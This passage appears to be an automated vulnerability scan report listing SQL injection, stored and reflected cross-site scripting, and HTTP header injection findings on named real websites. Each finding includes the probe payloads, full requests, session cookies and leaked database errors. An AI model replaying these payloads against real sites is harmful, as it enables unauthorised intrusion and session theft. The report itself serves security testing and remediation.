Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart%00''&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_la
...[SNIP]...

Response 2

1.18. http://www.godaddy.com/gdshop/offers/cross_sell.asp [ASPSESSIONIDACSTCQTS cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.godaddy.com
Path:	/gdshop/offers/cross_sell.asp

Issue detail

The ASPSESSIONIDACSTCQTS cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ASPSESSIONIDACSTCQTS cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM'%20and%201%3d1--%20; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response 1

Request 2

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM'%20and%201%3d2--%20; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB109&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=19a7e39c%2Ddcff%2D40f6%2D8f6d%2De19d0c50259d&shopper=46215917&querystring=ci%3D42031%26config%3Dssldefault&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&cookies=1&split=14; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:49:53 GMT
Content-Length: 275694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Low cost domain names, domain transfers, web hosting, email accounts, and so much more.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Pragma" content="no-cache">
<meta name="description" content="Register & transfer domains for less. Reliable hosting. Easy-to-use site builders. Affordable SSL certificates. eCommerce solutions. ICANN-accredited.">
<meta name="keywords" content="domain name, domain registration, registrar, renewal, transfer domain, cheap, inexpensive, domain, register, DNS, URL, web address, internet address, web site name, bulk domain registration, buy domain, private domain registration, bulk price, .com, .net, .org, Go Daddy.com, Go Daddy, godaddy.com, godaddy">
<link rel="shortcut icon" href="http://imagesak.securepaynet.net/assets/godaddy.ico">
<link rel="stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/1/gd_20110829_http.min.css" /><link rel="stylesheet" type="text/css" href="http://imagesak.securepaynet.net/css/20090113_1.css">

<style type="text/css">
ul.bul
...[SNIP]...

1.19. http://www.microcad.ca/cart/add/ [productid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.microcad.ca
Path:	/cart/add/

Issue detail

The productid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the productid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /cart/add/ HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search
Content-Length: 31
Cache-Control: max-age=0
Origin: http://www.microcad.ca
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.1.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; mf_lastpageview=1315085419325

quantity=1&productid=1011956760'

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1212
Content-Type: text/html
ACCEPT-RANGES: none

<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">

<h4>A PHP Error was encountered</h4>

<p>Severity: Notice</p>
<p>Message: Undefined index: 1011956760'</p>
<p>Filename: mo
...[SNIP]...
ctdescriptions pd2 ON (p.productid = pd2.productid AND pd2.type = '3' AND pd2.localeid = '3')
JOIN manufacturer m ON (p.manufacturerid = m.manufacturerid)
WHERE p.productid = '1011956760'' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1011956760''' at line 7

1.20. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.microcad.ca
Path:	/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760'?utm_source=google&utm_medium=product-search HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:28:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 226
Content-Type: text/html
ACCEPT-RANGES: none

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND an.localeid = '3' AND hn.localeid = '3' AND pa.localeid = '3'
ORDE' at line 7

2. Cross-site scripting (stored) previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.microcad.ca
Path:	/cart

Issue detail

The value of the productid request parameter submitted to the URL /cart/add/ is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks at the URL /cart. The payload 1542d'><script>alert(1)</script>91926b477ff was submitted in the productid parameter. This input was returned unmodified in a subsequent request for the URL /cart.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

Request 2

GET /cart HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.1.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; mf_lastpageview=1315085419325

Response 2

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:35:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 18528
Content-Type: text/html
ACCEPT-RANGES: none

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Microcad.ca | Sho
...[SNIP]...
<a href='/cart/remove/1542d'><script>alert(1)</script>91926b477ff'>
...[SNIP]...

3. HTTP header injection previous next
There are 4 instances of this issue:

http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 2]
http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 3]
http://www.wunderground.com/dotset.php [id parameter]
http://www.wunderground.com/dotset.php [name of an arbitrarily supplied request parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b60f6%0d%0aefd8c279903 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/b60f6%0d%0aefd8c279903/GBRCJV675BABRAPIIGSPD6?pv=76956596667.87833&cookie=&keyw=ssl+certificates HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:40:01 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/b60f6
efd8c279903/GBRCJV675BABRAPIIGSPD6/3NUTGTWFSRFIPAWBFDEMYM.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

3.2. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload efac1%0d%0a99e4b85b399 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/TL4HVZJAKBDONOOUY7KOKV/efac1%0d%0a99e4b85b399?pv=76956596667.87833&cookie=&keyw=ssl+certificates HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:40:13 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/TL4HVZJAKBDONOOUY7KOKV/efac1
99e4b85b399/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

3.3. http://www.wunderground.com/dotset.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/dotset.php

Issue detail

The value of the id request parameter is copied into the Set-Cookie response header. The payload 10dc5%0d%0a0e6b87e611 was submitted in the id parameter. This caused a response containing an injected HTTP header.

Request

GET /dotset.php?id=10dc5%0d%0a0e6b87e611&t=1 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:34 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-Powered-By: PHP/4.4.0
Set-Cookie: dottag.10dc5
0e6b87e611=1; expires=Sat, 17 Sep 2011 21:40:34 GMT; path=/; domain=.wunderground.com
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..

3.4. http://www.wunderground.com/dotset.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/dotset.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Set-Cookie response header. The payload 613a1%0d%0abc7451b72e2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /dotset.php?id=42/613a1%0d%0abc7451b72e2&t=1 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:34 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-Powered-By: PHP/4.4.0
Set-Cookie: dottag.42/613a1
bc7451b72e2=1; expires=Sat, 17 Sep 2011 21:40:34 GMT; path=/; domain=.wunderground.com
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..

4. Cross-site scripting (reflected) previous next
There are 26 instances of this issue:

http://feeds.feedburner.com/~s/meetup [i parameter]
http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]
http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]
http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]
http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mbox parameter]
http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mboxId parameter]
http://s29.sitemeter.com/js/counter.asp [site parameter]
http://s29.sitemeter.com/js/counter.js [site parameter]
http://www.godaddy.com/external/json/PcSetData.aspx [callback parameter]
http://www.meetup.com/api/ [method parameter]
http://www.microcad.ca/cart/add/ [productid parameter]
http://www.register.com/css/home-optimized.css [REST URL parameter 1]
http://www.register.com/domain/searchresults.rcmx [REST URL parameter 1]
http://www.register.com/domain/searchresults.rcmx [REST URL parameter 2]
http://www.register.com/favicon.ico [REST URL parameter 1]
http://www.register.com/font/vag-bold.ttf [REST URL parameter 1]
http://www.register.com/font/vag-bold.woff [REST URL parameter 1]
http://www.register.com/images/sn/hp.xml [REST URL parameter 1]
http://www.register.com/js/aop-attach.js [REST URL parameter 1]
http://www.register.com/js/homepage-optimized.js [REST URL parameter 1]
http://www.register.com/js/jquery-1.3.2.min.js [REST URL parameter 1]
http://www.register.com/unauthenticated_session_expired.rcmx [REST URL parameter 1]
http://www.typepad.com/services/toolbar [autofollowed parameter]
http://www.register.com/ [Referer HTTP header]
http://www.register.com/domain/searchresults.rcmx [Referer HTTP header]
http://www.register.com/unauthenticated_session_expired.rcmx [Referer HTTP header]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

4.1. http://feeds.feedburner.com/~s/meetup [i parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feeds.feedburner.com
Path:	/~s/meetup

Summary

Severity:	High
Confidence:	Certain
Host:	http://s29.sitemeter.com
Path:	/js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d44ca'%3balert(1)//d4128f40f21 was submitted in the site parameter. This input was echoed as d44ca';alert(1)//d4128f40f21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/counter.asp?site=s29fjgruberd44ca'%3balert(1)//d4128f40f21 HTTP/1.1
Host: s29.sitemeter.com
Proxy-Connection: keep-alive
